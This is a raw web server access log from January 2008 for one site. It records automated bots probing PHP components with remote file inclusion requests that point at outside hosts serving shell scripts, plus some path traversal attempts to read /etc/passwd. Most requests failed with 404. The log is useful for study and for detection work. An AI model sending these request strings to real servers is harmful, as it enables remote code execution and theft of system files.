189.23.27.5 - - [25/Jan/2008:06:28:09 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:06:28:10 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:06:28:14 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:30:26 -0800] "GET /logs/access_080106.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:30:26 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:30:26 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.20 - - [25/Jan/2008:06:30:30 -0800] "GET //index.php?body=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.185.237.20 - - [25/Jan/2008:06:30:30 -0800] "GET /logs//index.php?body=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
202.75.5.220 - - [25/Jan/2008:06:30:44 -0800] "GET /logs/access_071230.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:30:47 -0800] "GET /logs/access_080106.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:30:47 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:30:47 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:31:35 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:06:32:01 -0800] "GET /logs/access_080101.log//photoalb/lib/static/header.php?set_menu=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:32:11 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.249.220 - - [25/Jan/2008:06:32:51 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crownvisioncenter.com/company/_notes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:06:33:35 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:06:33:36 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:06:33:36 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:06:33:36 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:06:33:36 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:06:33:36 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.10.137.168 - - [25/Jan/2008:06:33:48 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.128.138.106 - - [25/Jan/2008:06:34:03 -0800] "GET /logs/access_071225.log//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.128.138.106 - - [25/Jan/2008:06:34:04 -0800] "GET //includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.128.138.106 - - [25/Jan/2008:06:34:05 -0800] "GET /logs//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:06:35:12 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:06:35:12 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:06:35:13 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.128.138.106 - - [25/Jan/2008:06:35:24 -0800] "GET /logs/access_071225.log//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.128.138.106 - - [25/Jan/2008:06:35:25 -0800] "GET //includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.128.138.106 - - [25/Jan/2008:06:35:26 -0800] "GET /logs//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.241.215.186 - - [25/Jan/2008:06:35:29 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.128.138.106 - - [25/Jan/2008:06:35:44 -0800] "GET /logs/access_071225.log//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.128.138.106 - - [25/Jan/2008:06:35:45 -0800] "GET //includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.128.138.106 - - [25/Jan/2008:06:35:46 -0800] "GET /logs//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:06:36:03 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:06:36:08 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:06:36:08 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:06:36:08 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.128.138.106 - - [25/Jan/2008:06:36:09 -0800] "GET /logs/access_071225.log//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.128.138.106 - - [25/Jan/2008:06:36:11 -0800] "GET /logs/access_071225.log//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.128.138.106 - - [25/Jan/2008:06:36:11 -0800] "GET //includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.128.138.106 - - [25/Jan/2008:06:36:12 -0800] "GET //includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.128.138.106 - - [25/Jan/2008:06:36:12 -0800] "GET /logs//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.128.138.106 - - [25/Jan/2008:06:36:13 -0800] "GET /logs//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.150.32.163 - - [25/Jan/2008:06:36:30 -0800] "GET /logs/access.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.150.32.163 - - [25/Jan/2008:06:36:33 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:06:36:35 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.150.32.163 - - [25/Jan/2008:06:36:36 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.208.81.132 - - [25/Jan/2008:06:36:38 -0800] "GET /logs/access_071229.log/page.php?s=http://www.naimaa.com/templates/r00t/safeoff.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [25/Jan/2008:06:36:38 -0800] "GET /logs/page.php?s=http://www.naimaa.com/templates/r00t/safeoff.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
8.6.223.5 - - [25/Jan/2008:06:36:56 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:06:37:21 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://deniamusic.com/keplek.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:06:37:21 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://deniamusic.com/keplek.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:06:37:21 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://deniamusic.com/keplek.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:06:37:21 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://deniamusic.com/keplek.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:06:37:21 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://deniamusic.com/keplek.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:06:37:21 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://deniamusic.com/keplek.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.54.133.35 - - [25/Jan/2008:06:39:35 -0800] "GET /?mosConfig_absolute_path=http://www.contingences.com/IMG/check.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
212.54.133.35 - - [25/Jan/2008:06:39:53 -0800] "GET /logs/?mosConfig_absolute_path=http://www.contingences.com/IMG/check.txt? HTTP/1.1" 200 31683 "-" "libwww-perl/5.803" "www.dmulk.com"
212.54.133.35 - - [25/Jan/2008:06:40:00 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.contingences.com/IMG/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.222.131.65 - - [25/Jan/2008:06:40:32 -0800] "GET /logs/access_071225.log/content/multithumb/multithumb?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.222.131.65 - - [25/Jan/2008:06:40:33 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:06:40:40 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:06:40:41 -0800] "GET /convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:06:40:41 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:06:42:22 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:06:42:32 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:06:42:37 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.9.138 - - [25/Jan/2008:06:43:30 -0800] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.p-l.nl/cache/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.215.186 - - [25/Jan/2008:06:43:47 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.215.186 - - [25/Jan/2008:06:43:47 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:06:45:41 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://deniamusic.com/keplek.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:06:45:42 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://deniamusic.com/keplek.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:06:45:42 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://deniamusic.com/keplek.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.214.232 - - [25/Jan/2008:06:46:36 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.26.216.70 - - [25/Jan/2008:06:47:07 -0800] "GET /cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
81.26.216.70 - - [25/Jan/2008:06:47:08 -0800] "GET /logs/cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
8.6.223.5 - - [25/Jan/2008:06:47:15 -0800] "GET /logs/access_071225.log/content/multithumb/multithumb?mosConfig_absolute_path=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
8.6.223.5 - - [25/Jan/2008:06:47:15 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
8.6.223.5 - - [25/Jan/2008:06:47:28 -0800] "GET /logs/access_071228.log/content/multithumb/multithumb?mosConfig_absolute_path=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.167 - - [25/Jan/2008:06:48:42 -0800] "GET /logs/access_070923.log HTTP/1.0" 200 55220 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:06:48:48 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:06:48:48 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.215.186 - - [25/Jan/2008:06:48:54 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
152.157.32.252 - - [25/Jan/2008:06:49:16 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=inurlhttp://alcohol114.com/dboard/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
152.157.32.252 - - [25/Jan/2008:06:49:16 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=inurlhttp://alcohol114.com/dboard/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
152.157.32.252 - - [25/Jan/2008:06:49:16 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=inurlhttp://alcohol114.com/dboard/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:49:28 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:49:28 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:49:29 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
152.157.32.252 - - [25/Jan/2008:06:49:32 -0800] "GET /logs/access_071228.log//multithumb/multithumb?mosConfig_absolute_path=inurlhttp://alcohol114.com/dboard/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:49:57 -0800] "GET /logs/access_071230.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:06:50:54 -0800] "GET /logs/access_080106.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:06:50:54 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:06:51:12 -0800] "GET /logs/access_071220.log//components/com_simpleboard/image_upload.php?sbp=http://deniamusic.com/keplek.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:06:51:12 -0800] "GET /logs/access_071220.log//components/com_simpleboard/image_upload.php?sbp=http://deniamusic.com/keplek.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:06:51:17 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:06:51:58 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:52:28 -0800] "GET /logs/access_080106.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:52:28 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:52:28 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.65.116.80 - - [25/Jan/2008:06:52:33 -0800] "GET /logs/access_080106.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [25/Jan/2008:06:52:34 -0800] "GET /logs/access_080106.log/errors.php?error=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [25/Jan/2008:06:52:34 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [25/Jan/2008:06:52:34 -0800] "GET /errors.php?error=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [25/Jan/2008:06:52:34 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
